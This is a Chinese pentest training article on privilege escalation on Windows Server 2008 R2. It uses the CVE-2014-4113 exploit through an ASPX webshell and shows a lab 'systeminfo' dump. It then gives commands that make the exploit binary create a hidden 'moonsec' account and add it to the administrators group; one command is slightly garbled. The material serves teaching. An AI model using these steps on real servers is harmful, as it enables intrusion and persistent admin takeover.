1. 首页
  2. 渗透测试

[原创]WEB安全第六章提权篇10 winserver2008R2溢出提权

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第六章提权篇10 winserver2008R2溢出提权

1、简介
在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。
如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。
2、CVE-2014-4113-Exploit
这个版本的提权工具 可以对winserver2008 的系统进行溢出提权
3、实战
http://www.demo1.com/asp.aspx

[原创]WEB安全第六章提权篇10 winserver2008R2溢出提权

systeminfo 这个命令查看系统信息的
主机名: WIN-HRKJ54V1GSJ
OS 名称: Microsoft Windows Web Server 2008 R2
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00500-001-0000635-84743
初始安装日期: 2019/3/3, 16:24:34
系统启动时间: 2019/4/7, 17:14:40
系统制造商: VMware, Inc.
系统型号: VMware7,1
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
[02]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
BIOS 版本: VMware, Inc. VMW71.00V.6997262.B64.1710270607, 2017/10/27
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 4,095 MB
可用的物理内存: 2,939 MB
虚拟内存: 最大值: 8,188 MB
虚拟内存: 可用: 6,603 MB
虚拟内存: 使用中: 1,585 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 2 个修补程序。
[01]: KB2999226
[02]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) 82574L Gigabit Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.0.105
[02]: fe80::986d:3564:19ad:2447

溢出成功

[原创]WEB安全第六章提权篇10 winserver2008R2溢出提权

如果找不到可写目录 可以 使用遍历可写目录的脚本进行查找

[原创]WEB安全第六章提权篇10 winserver2008R2溢出提权

增加用户
/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe “net moonsec moonsec /add”
增加到用户组
/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe “net localgroup administrators moonsec /add”

[原创]WEB安全第六章提权篇10 winserver2008R2溢出提权

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/438.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息